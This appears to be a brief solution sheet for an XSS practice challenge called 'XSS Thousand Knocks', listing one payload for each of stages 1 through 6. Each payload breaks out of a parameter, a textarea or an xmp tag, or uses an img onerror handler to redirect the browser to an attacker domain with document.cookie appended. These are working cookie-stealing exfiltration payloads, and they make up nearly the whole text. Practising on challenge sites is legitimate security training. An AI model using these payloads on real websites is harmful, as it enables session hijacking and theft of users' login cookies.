XSS Thousand Knocks[link]
- {} == your domain
> ex) http://xss.silnex.kr/ - Skip stage url, payload only
- I open stage 1 to 6
Stage 1
/?location=%22http://example.com/?%22%2Bdocument.cookie
Stage 2
/?q=<script>location="{}?"%2bdocument.cookie</script>
Stage 3
/?q="><script>location="{}?"+document.cookie</script>
Stage 4
/?q='><script>location='{}?'+document.cookie</script>
Stage 5
/?q=</textarea><script>location='{}?'+document.cookie</script>
Stage 6
/?q=</xmp><img+src=1+onerror=location='{}?'+document.cookie>